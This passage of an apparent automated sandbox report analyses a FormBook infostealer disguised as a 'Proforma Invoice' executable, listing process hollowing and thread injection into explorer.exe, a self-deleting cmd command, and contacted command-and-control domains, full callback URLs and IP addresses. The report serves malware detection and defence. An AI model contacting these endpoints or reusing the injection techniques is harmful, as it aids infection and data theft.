          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CCD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CCD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D63D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CDC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CDC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.theyogirunner.com
          Source: C:\Windows\explorer.exeDomain query: www.kladios.com
          Source: C:\Windows\explorer.exeNetwork Connect: 37.48.65.148 80
          Source: C:\Windows\explorer.exeDomain query: www.28ji.site
          Source: C:\Windows\explorer.exeNetwork Connect: 104.232.96.207 80
          Source: C:\Windows\explorer.exeDomain query: www.hireinone.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.pecon.pro
          Source: C:\Windows\explorer.exeNetwork Connect: 85.159.66.93 80
          Source: C:\Windows\explorer.exeDomain query: www.kingguardgroup.com
          Source: C:\Windows\explorer.exeDomain query: www.rebeccannemontgomery.net
          Source: C:\Windows\explorer.exeNetwork Connect: 35.205.61.67 80
          Source: C:\Windows\explorer.exeDomain query: www.closetofaurora.com
          Source: C:\Windows\explorer.exeDomain query: www.letstrumpbiden.com
          Source: C:\Windows\explorer.exeDomain query: www.goodlukc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 69.162.102.218 80
          Source: C:\Windows\explorer.exeNetwork Connect: 121.254.178.252 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.229.108 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeSection loaded: unknown target: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: AE0000
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
          Source: explorer.exe, 00000005.00000000.684754948.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.658255568.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.914263948.0000000003540000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.658255568.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.914263948.0000000003540000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.658255568.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.914263948.0000000003540000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.658255568.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.914263948.0000000003540000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.673760254.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432567 Sample: Proforma Invoice and Bank s... Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 31 www.oilleakgames.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 8 other signatures 2->45 11 Proforma Invoice and Bank swift-REG.PI-0086547654.exe 20 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 11->29 dropped 57 Maps a DLL or memory area into another process 11->57 15 Proforma Invoice and Bank swift-REG.PI-0086547654.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 33 closetofaurora.com 162.0.229.108, 49759, 80 NAMECHEAP-NETUS Canada 18->33 35 www.kingguardgroup.com 69.162.102.218, 49763, 80 LIMESTONENETWORKSUS United States 18->35 37 13 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 49 Performs DNS queries to domains with low reputation 18->49 22 raserver.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Proforma Invoice and Bank swift-REG.PI-0086547654.exe29%VirustotalBrowse
          Proforma Invoice and Bank swift-REG.PI-0086547654.exe30%ReversingLabsWin32.Spyware.Noon
          Proforma Invoice and Bank swift-REG.PI-0086547654.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.raserver.exe.51c7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.raserver.exe.30cde50.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.theyogirunner.com0%VirustotalBrowse
          closetofaurora.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.kingguardgroup.com/dp3a/?GR-d=+9xVWhQ3YZdKS9LSdJD9Q5IGOGjZWYGRUC/PBrhb5+8EiR866LajmsNw/hU5zOKELtJS&nPTdU=-ZoHnNt0frfd2Hn0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.hireinone.xyz/dp3a/?GR-d=gNGby8oVX6PgZB5GWA7CusOGqzi3GywYGs/3OTvKjB1NulubMkWwqj/edMXwHBCob9Lh&nPTdU=-ZoHnNt0frfd2Hn0%Avira URL Cloudsafe
          http://www.28ji.site/dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=/zMHFgDZZhoYLr+uNA/LZaIwAqqHNoUyccNHiXKU1Oc8waRhqa0xV5lesUE3sQ0wja+H0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.rebeccannemontgomery.net/dp3a/?GR-d=ayCA4X1Kl09ymHiLnx81tYxQpS3YxUUFxhK9zdH9kq/gCaIMsyBIYQcEhhLQSA14VAsf&nPTdU=-ZoHnNt0frfd2Hn0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.pecon.pro/dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=qfgFr8ieK4pb0oEJahXrwfByJwdYjuIB81dpFpRA2DwOSKuw2QjIPW4nYRzvvZDFGDPJ0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.theyogirunner.com/dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF0%Avira URL Cloudsafe
          http://www.kladios.com/dp3a/?GR-d=9p/K3n16Mfij3JUlf4zaR/Rujbmkv/CDhZs1M9Rj6A9SEkbuvv/NT9LewVshmGfbFjhm&nPTdU=-ZoHnNt0frfd2Hn0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
